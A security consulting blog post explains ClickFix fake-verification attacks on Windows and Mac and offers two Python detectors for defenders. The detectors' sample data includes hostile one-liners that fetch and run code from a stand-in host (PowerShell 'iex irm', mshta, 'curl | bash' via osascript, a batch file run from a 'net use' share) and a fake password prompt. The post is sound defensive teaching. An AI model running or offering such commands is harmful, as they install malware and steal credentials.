The Fake Verification Scam Infecting Windows AND Mac Users: What Your Team Needs to Know

The Attack That Tricks You Into Infecting Yourself

Imagine this: You’re browsing the web and a verification popup appears. It looks exactly like the Cloudflare or Google CAPTCHAs you’ve seen a thousand times. Or maybe you’re searching for how to clean up your Mac and find a helpful ChatGPT conversation with step-by-step instructions.

But instead of clicking pictures of traffic lights, you’re asked to press some keyboard shortcuts. Or instead of downloading a trusted app, you’re told to paste a single command into your Terminal.

It seems harmless. You follow the instructions.

And just like that, you’ve installed malware on your own computer, under your own account, using the same built-in tools your security stack expects you to use.

This is ClickFix, one of the most dangerous and rapidly evolving attack techniques of 2026. And it now targets both Windows AND Mac users.

Why ClickFix Is So Dangerous

Traditional malware tries to sneak past your security software. ClickFix doesn’t bother. Instead, it tricks you into running the malware yourself.

When you, the user, deliberately execute a command, it runs under your account with your permissions, and it usually invokes legitimately signed, built-in tools (the Run dialog, PowerShell, ‘net use’, Terminal, curl) rather than dropping an executable. There is no exploit to detect and often no file to scan, so security software that keys on those signals sees ordinary user activity and does not intervene.

This is why the latest ClickFix variant discovered by Atos researchers bypassed Microsoft Defender entirely and was only discovered through manual threat hunting. It’s why Mac versions bypass Gatekeeper and XProtect — Apple’s built-in security tools.

Attackers aren’t trying to break through your defenses. They’re convincing you to open the door from the inside.

How ClickFix Attacks Work on Windows

The Windows version typically starts with a fake CAPTCHA or verification page. You might land on it through a phishing email, a compromised website, a malicious ad, or a poisoned search result.

The page looks completely legitimate — often using real Cloudflare branding, professional design, and familiar language like ‘Verify you are human.’

But then it asks you to do something unusual:

‘Press Win+R, then Ctrl+V, then Enter to verify.’

Here’s what actually happens:

  1. Win+R opens the Windows Run dialog — a tool that executes commands directly on your computer
  2. Ctrl+V pastes a malicious command that the page’s script silently placed on your clipboard when you clicked the ‘verify’ checkbox (browsers only let a page write to the clipboard during a user interaction, which is why the page needs your click first)
  3. Enter executes that command

The Latest Windows Variant

The newest Windows ClickFix attack discovered by Atos researchers uses a particularly clever technique:

  • The pasted command maps a remote server as a network drive on your computer
  • It runs a batch file from that remote server
  • The batch file downloads a trojanized version of WorkFlowy (a legitimate note-taking app)
  • The infected app contacts the attacker’s server every 2 seconds, waiting for instructions
  • The mapped drive is immediately removed to hide evidence

Because the attack uses ‘net use’ commands instead of PowerShell or other commonly monitored tools, it flew under the radar. Microsoft Defender didn’t catch it. Only manual threat hunting found it. That is a gap in default detections rather than a true blind spot: the Run dialog keeps a history of what was typed, process creation for net.exe and cmd.exe is logged, and the connection to the mapped share crosses the network, so a tuned detection can still catch this pattern.

Other Windows Variants

ClickFix is evolving rapidly. Other recent Windows attacks include:

  • Fake Windows Update screens — Full-screen pages showing ‘Working on updates… 95% complete’ with instructions to paste a command to ‘complete the security check’
  • Windows Terminal attacks — Using Terminal instead of Run, since security tools have gotten better at monitoring Run-based attacks
  • DNS-based staging — Using DNS lookups to retrieve malware, blending malicious activity into normal network traffic

How ClickFix Attacks Work on Mac

Mac users aren’t safe either. ClickFix campaigns targeting macOS have been evolving since late 2025, delivering the MacSync infostealer through increasingly sophisticated social engineering.

The ChatGPT Conversation Trick

One of the cleverest recent attacks uses actual shared ChatGPT conversations as bait.

Here’s how it works:

  1. Attackers pay for Google ads that appear when you search for things like ‘how to clean up your Mac’ or ‘ChatGPT Atlas browser’
  2. The ads lead to real shared conversations on the legitimate ChatGPT website
  3. These conversations appear to be helpful guides, but they redirect you to fake GitHub-themed installation pages
  4. The fake pages instruct you to open Terminal and paste a command to ‘complete the installation’
  5. The command downloads and runs the MacSync infostealer

This attack is particularly dangerous because:

  • The content is hosted on a trusted domain (OpenAI’s actual ChatGPT site)
  • ChatGPT conversations are relatively new, so users don’t associate them with danger
  • The instructions look like legitimate developer workflows

What MacSync Steals

The MacSync infostealer is comprehensive and terrifying. It harvests:

  • Browser data — Passwords, cookies, autofill data, browsing history
  • Cryptocurrency wallets — 25+ browser extension wallets (MetaMask, Phantom, Coinbase) plus desktop wallets (Exodus, Electrum, Atomic)
  • Keychain databases and SSH keys — Wi-Fi passwords, application credentials, and the contents of ~/.ssh
  • Developer credentials — AWS credentials, Kubernetes configurations
  • Telegram sessions — Allowing attackers to impersonate you

Even worse, MacSync can trojanize hardware wallet apps like Ledger and Trezor, injecting fake dialogs that steal your PIN and 24-word recovery phrase. That means attackers can drain your crypto wallets even if you use hardware security.

The Persistent Fake Password Dialog

MacSync includes a particularly nasty trick: it displays persistent fake ‘System Preferences’ dialogs asking for your macOS password. The dialogs keep appearing until you enter your password.

Once you do, MacSync saves your password in plaintext and uses it to decrypt your Keychain and browser data.

Evolution of Mac Attacks

Sophos researchers tracked three distinct campaigns between November 2025 and February 2026:

  • November 2025: Classic ClickFix using fake ChatGPT/OpenAI download pages via Google ads
  • December 2025: Shift to shared ChatGPT conversations redirecting to fake GitHub pages
  • February 2026: Advanced multi-stage loaders with in-memory execution, making detection much harder

The February variant runs its later stages entirely in memory without writing files to disk, so file-based scanning has nothing to inspect. It is not invisible, though: the loader still has to be fetched over the network and launched by a process the user started, so process-creation and network telemetry still see it.

The Numbers Are Alarming

ClickFix campaigns are highly effective. Sophos researchers found:

  • Attackers built tracking infrastructure to monitor campaign success
  • Hidden analytics collected IP addresses, geolocation, and timestamps
  • Activity was reported directly to Telegram bots in real time
  • Tens of thousands of user interactions across multiple domains within days of deployment

Microsoft’s security team has also been tracking these campaigns, noting that ClickFix-style attacks are now targeting popular AI and developer tools, with at least 20 distinct malware campaigns targeting AI and coding tools between February and March 2026 alone.

Why Your Antivirus Won’t Save You

Let’s be very clear about this: ClickFix attacks work because you run the malware yourself.

Security software is tuned to stop malicious files and exploits. But when you:

  • Open the Run dialog and paste a command
  • Open Terminal and paste a command
  • Enter your password into a dialog box

…the commands run under your own account and use legitimate system tools. There is no exploit and often no file to scan, so tools that key on those signals see a user taking deliberate action and do not intervene.

This is why multiple ClickFix variants have bypassed:

  • Microsoft Defender
  • macOS Gatekeeper
  • macOS XProtect
  • Various third-party antivirus tools

That makes the user the last line of defense, which is why training is critical. It does not make technical controls pointless: the same commands leave traces (Run-dialog history, process-creation events, outbound connections) that a tuned detection will catch, and the controls described later in this article narrow the window.

Warning Signs Everyone Needs to Know

Train yourself and your employees to recognize these red flags:

On Any Platform

  • Instructions to run commands — No legitimate verification or CAPTCHA ever requires pasting commands into Run, PowerShell, Terminal, or Command Prompt. Some installers do ask for a pasted command (see The Developer Problem below), but you reach those by going to the tool’s own site, never through a CAPTCHA, an ad, or a chat transcript
  • Keyboard shortcut instructions — Win+R, Ctrl+V, or any unusual key combinations for ‘verification’
  • Urgency or pressure — Countdowns, threats, ‘verify now or lose access’
  • Instructions to paste something you didn’t intentionally copy

On Windows

  • Fake CAPTCHAs asking you to press Win+R
  • Full-screen ‘Windows Update’ pages with command instructions
  • Pop-ups claiming your computer has a problem that requires running a command

On Mac

  • Any website telling you to paste commands into Terminal
  • ChatGPT conversations redirecting to installation pages
  • Fake GitHub-themed installation interfaces
  • Persistent ‘System Preferences’ dialogs asking for your password
  • Instructions that include ‘curl’ or ‘bash’ commands on a page you did not deliberately navigate to for that tool

The Developer Problem

Here’s the uncomfortable truth: the ClickFix attack mimics something developers legitimately do every day.

Homebrew, Rust, nvm, and dozens of other tools install through ‘curl | sh’ in Terminal, fetched from the tool’s own documented domain. Security teams can’t simply tell technical staff ‘never paste commands’ when that’s how half their toolchain works.

This means technical solutions are critical:

  • Managed package registries — Control where software can be installed from
  • MDM-enforced application distribution — Limit Terminal access for standard users
  • Allowlisted installation sources — Take the decision out of individual hands

What to Do If You Think You Fell For It

If you followed suspicious instructions:

  1. Disconnect from the network immediately — Unplug ethernet or turn off Wi-Fi
  2. Don’t try to ‘undo’ anything yourself — You might make it worse, and you will destroy evidence the responders need
  3. Contact your IT team or security professional immediately
  4. Document what happened — What site, what you clicked, what commands you ran
  5. Don’t log into any accounts from the affected machine — Your credentials may already be compromised; rotate passwords from a clean device
  6. If you entered your Mac password into a suspicious dialog — Assume your Keychain is compromised: change all passwords, and revoke anything a stealer can replay without a password, such as browser sessions, Telegram sessions, and AWS or Kubernetes credentials

Quick action matters. The malware may still be establishing itself, and disconnecting can prevent data from being sent to attackers.

How to Protect Your Business

Technical controls alone won’t stop social engineering. Here’s what actually works:

1. Employee Training

Your employees are the target. They need to know:

  • What ClickFix attacks look like on both Windows and Mac
  • That legitimate verification pages NEVER ask for command execution, and that software is installed only from approved sources
  • What to do if they encounter a suspicious page
  • That reporting is encouraged, not punished

One annual security presentation isn’t enough. These attacks evolve weekly.

2. Platform-Specific Controls

For Windows:

  • Monitor the RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), which records what users type into the Run dialog, for suspicious commands
  • Restrict PowerShell and command execution where possible
  • Use application control to limit what programs can run
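The following is an added example written for this article; it is not tooling from Atos, Sophos, or Pendergrass Consulting. It scores command lines for the ClickFix shapes described above (a ‘net use’ mapping followed by a batch file from the share, a PowerShell one-liner with a hidden window and a fake ‘verification’ comment, a ‘curl | bash’ pipeline) and reads the RunMRU key when run on Windows, falling back to constructed samples elsewhere. It also handles the developer problem from the previous section: a plain download-and-pipe from an allowlisted installer host scores zero, while the same shape from an unknown host is flagged. The weights, the allowlisted hosts, and the sample commands (which use the reserved .invalid domain) are assumptions to tune for your environment.

```python
"""Score command lines for ClickFix indicators.

Added example for this article; not Atos, Sophos or Pendergrass tooling.
Input is any list of command strings: the Run-dialog history (RunMRU) on
Windows, a shell history, or the command line of a process-creation event.
The sample commands are constructed to mimic the article's patterns and use
the reserved .invalid TLD; they are not real indicators.
"""
import re
from urllib.parse import urlparse

# Hosts whose "curl | sh" installers the organisation accepts.
# Assumed allowlist: replace with your approved package sources.
ALLOWED_INSTALL_HOSTS = {"raw.githubusercontent.com", "sh.rustup.rs"}

# (label, pattern, weight). Weights are a starting point, not ground truth.
INDICATORS = [
    ("mshta launcher", re.compile(r"\bmshta(\.exe)?\b", re.I), 4),
    ("hidden PowerShell window", re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I), 3),
    ("encoded PowerShell", re.compile(r"-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), 4),
    ("execution policy bypass", re.compile(r"-(ep|executionpolicy)\s+bypass\b", re.I), 2),
    ("net use to a remote share", re.compile(r"\bnet\s+use\b.*\\\\", re.I), 3),
    ("script run from a UNC path", re.compile(r"\\\\[^\\\s]+\\\S+\.(bat|cmd|vbs|js|ps1)\b", re.I), 3),
    ("download tool", re.compile(r"\b(curl|wget|iwr|irm|invoke-webrequest|invoke-restmethod)\b", re.I), 2),
    ("pipe into a shell", re.compile(r"\|\s*(iex|sh|bash|zsh)\b", re.I), 3),
    ("base64 decode", re.compile(r"\bbase64\b.*?(-d|--decode)\b", re.I), 2),
    ("osascript", re.compile(r"\bosascript\b", re.I), 2),
    # ClickFix commands often end in a comment so the Run box shows
    # "verification" text rather than the command itself.
    ("fake verification text", re.compile(r"(#|\brem\b).*(captcha|i am not a robot|verif)", re.I), 4),
]
URL_RE = re.compile(r"https?://[^\s'\"|;&<>()]+", re.I)


def read_runmru():
    """Return the current user's Run-dialog history on Windows, [] elsewhere."""
    try:
        import winreg
    except ImportError:
        return []
    key_path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
    commands = []
    try:
        with winreg.OpenKey(winreg.HKEY_CURRENT_USER, key_path) as key:
            index = 0
            while True:
                try:
                    name, value, _ = winreg.EnumValue(key, index)
                except OSError:  # no more values
                    break
                index += 1
                if name != "MRUList" and isinstance(value, str):
                    # Entries are stored as "<command>\1"; strip the suffix.
                    commands.append(value[:-2] if value.endswith("\\1") else value)
    except OSError:  # key absent or not readable
        pass
    return commands


def score_command(cmd):
    """Return (score, labels) for one command line."""
    hits = [(label, weight) for label, rx, weight in INDICATORS if rx.search(cmd)]
    labels = [label for label, _ in hits]
    score = sum(weight for _, weight in hits)
    # A known installer host explains a plain download-and-pipe. Anything
    # beyond that shape (hidden window, encoding, UNC share, fake comment)
    # still counts even when the host is allowlisted.
    urls = URL_RE.findall(cmd)
    plain_install = set(labels) <= {"download tool", "pipe into a shell"}
    if urls and plain_install and all(urlparse(u).hostname in ALLOWED_INSTALL_HOSTS for u in urls):
        return 0, labels
    return score, labels


def triage(commands, threshold=3):
    """Return [(cmd, score, labels)] for commands scoring at or above threshold."""
    results = [(cmd, *score_command(cmd)) for cmd in commands]
    return [r for r in results if r[1] >= threshold]


# Constructed samples: the first six mimic the article's patterns, the rest are benign.
SAMPLE_COMMANDS = [
    'powershell -w hidden -c "iex (irm https://example.invalid/verify)" # "I am not a robot - reCAPTCHA Verification ID: 7811"',
    "mshta https://example.invalid/verify.hta",
    r"cmd /c net use Z: \\example.invalid\share && Z:\run.bat && net use Z: /delete",
    r"\\example.invalid\share\run.bat",
    "echo Y3VybCAtcyBodHRwOi8v | base64 -d | bash",
    "osascript -e 'do shell script \"curl -s https://example.invalid/p | bash\"'",
    "notepad.exe",
    r"\\fileserver\share\report.docx",
    "curl -fsSL https://sh.rustup.rs | sh",
    '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"',
]

if __name__ == "__main__":
    history = read_runmru() or SAMPLE_COMMANDS
    for cmd, score, labels in triage(history):
        print(f"[{score:>2}] {cmd}\n     {', '.join(labels)}")
```

Run it on a Windows endpoint to triage that user’s RunMRU history; feed it a list of command lines from an EDR export to apply the same scoring at scale. The single weakest signal, ‘download tool’ alone, never crosses the threshold by itself, which keeps ordinary curl and Invoke-WebRequest usage out of the alert queue.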

For Mac:

  • Push MDM profiles that block Terminal access for standard users
  • Configure Privacy Preferences Policy Control to pre-deny Terminal Full Disk Access
  • Deploy EDR rules that flag osascript spawning curl or bash processes
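As an added example of the last control (not Sophos or Pendergrass code), the script below walks macOS process-creation events and flags two lineages: a shell or download tool whose ancestry includes osascript, and an osascript invocation that draws a password-style prompt. The event shape (pid, ppid, name, cmdline) and the sample events are constructed; the assumption that the fake ‘System Preferences’ prompt is built with AppleScript’s ‘display dialog … with hidden answer’ is mine, since the article only says the dialog mimics System Preferences. A developer’s own ‘curl’ under an interactive shell is included to show it is not flagged.

```python
"""Flag ClickFix-style process lineages in macOS process-creation events.

Added example for this article; not Sophos or Pendergrass tooling. Each
event is a dict with pid, ppid, name and cmdline, the minimum most EDR
exports reduce to. The sample events are constructed (reserved .invalid TLD).
"""

# Processes that should not appear under osascript in normal use.
SHELLS_AND_FETCHERS = {"sh", "bash", "zsh", "curl", "wget", "python3"}


def ancestors(by_pid, pid, max_depth=8):
    """Parent chain of pid, nearest parent first, stopping at a gap or at depth."""
    chain = []
    event = by_pid.get(pid)
    while event is not None and len(chain) < max_depth:
        event = by_pid.get(event["ppid"])
        if event is None:
            break
        chain.append(event)
    return chain


def lineage(by_pid, event):
    """Human-readable root-to-leaf chain, e.g. 'launchd > Terminal > zsh > curl'."""
    names = [a["name"] for a in reversed(ancestors(by_pid, event["pid"]))]
    return " > ".join(names + [event["name"]])


def find_suspicious(events):
    """Return one finding dict per event that matches a rule."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        parent_names = {a["name"] for a in ancestors(by_pid, e["pid"])}
        # Rule 1: osascript (directly, or via the sh it spawns for
        # "do shell script") launching a shell or download tool.
        if e["name"] in SHELLS_AND_FETCHERS and "osascript" in parent_names:
            findings.append({"pid": e["pid"], "rule": "osascript spawned " + e["name"],
                             "lineage": lineage(by_pid, e), "cmdline": e["cmdline"]})
        # Rule 2: a password-style prompt. Assumed to be built with
        # AppleScript's "display dialog ... with hidden answer".
        if e["name"] == "osascript" and "hidden answer" in e["cmdline"]:
            findings.append({"pid": e["pid"], "rule": "password-style dialog from osascript",
                             "lineage": lineage(by_pid, e), "cmdline": e["cmdline"]})
    return findings


def flagged_pids(events):
    return {f["pid"] for f in find_suspicious(events)}


# Constructed sample: one benign developer install and one ClickFix chain.
SAMPLE_EVENTS = [
    {"pid": 1, "ppid": 0, "name": "launchd", "cmdline": "/sbin/launchd"},
    {"pid": 300, "ppid": 1, "name": "Terminal",
     "cmdline": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"},
    {"pid": 301, "ppid": 300, "name": "zsh", "cmdline": "-zsh"},
    # A developer running a documented installer: curl under an interactive shell.
    {"pid": 302, "ppid": 301, "name": "curl", "cmdline": "curl -fsSL https://sh.rustup.rs"},
    # The pasted ClickFix command and what it spawns.
    {"pid": 303, "ppid": 301, "name": "osascript",
     "cmdline": "osascript -e 'do shell script \"curl -s https://example.invalid/p | bash\"'"},
    {"pid": 304, "ppid": 303, "name": "sh", "cmdline": "sh -c curl -s https://example.invalid/p | bash"},
    {"pid": 305, "ppid": 304, "name": "curl", "cmdline": "curl -s https://example.invalid/p"},
    {"pid": 306, "ppid": 304, "name": "bash", "cmdline": "bash"},
    {"pid": 307, "ppid": 306, "name": "osascript",
     "cmdline": "osascript -e 'display dialog \"System Preferences wants to make changes.\" "
                "default answer \"\" with hidden answer'"},
]

if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_EVENTS):
        print(f"pid {f['pid']}: {f['rule']}\n   {f['lineage']}\n   {f['cmdline']}")
```

The lineage string is what an analyst needs first: ‘launchd > Terminal > zsh > osascript > sh > curl’ tells you the user typed something into Terminal that handed control to AppleScript, which is not how any documented installer works.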

3. Web Filtering

Block known malicious domains and categories. While attackers constantly create new sites, filtering reduces exposure.

4. Simulated Phishing

Test employees with realistic ClickFix simulations. Find who’s vulnerable before attackers do.

5. Incident Response Planning

Have a plan. Know what you’ll do when — not if — someone falls for an attack. Test it regularly.

The Bottom Line

ClickFix represents a fundamental shift in how attackers operate. Instead of trying to break through your security, they trick you into bypassing it yourself.

These attacks work on Windows AND Mac. They evolve constantly. They bypass traditional security tools. And they’re spreading rapidly through increasingly clever social engineering — including using trusted platforms like ChatGPT to deliver malicious instructions.

Technology helps, but the real defense is awareness. Every employee needs to know: a verification page never asks you to run commands, and a page you reached through an ad, a search result, or a shared chat has no business asking you to install anything.

If a page asks you to press Win+R, paste something into Terminal, or run any command to ‘verify’ or ‘install’ something — close it immediately. It’s an attack.

We Can Help

At Pendergrass Consulting, we provide cybersecurity awareness training designed for real-world threats like ClickFix. Our training covers:

  • Current attack techniques — Including platform-specific threats for both Windows and Mac
  • Recognition training — Teaching employees to spot social engineering across devices
  • Simulated phishing campaigns — Testing and reinforcing what employees learn
  • Incident response guidance — Ensuring everyone knows what to do when something goes wrong
  • Ongoing updates — Because threats evolve and training needs to keep pace

Don’t wait for an employee to fall for a fake CAPTCHA or a malicious ChatGPT link. Prepare them now.

Contact us today to schedule security awareness training for your team.

Pendergrass Consulting provides cybersecurity training, IT support, and technology consulting services throughout the Triangle area, including Raleigh, Durham, Chapel Hill, Cary, Apex, and the surrounding communities.
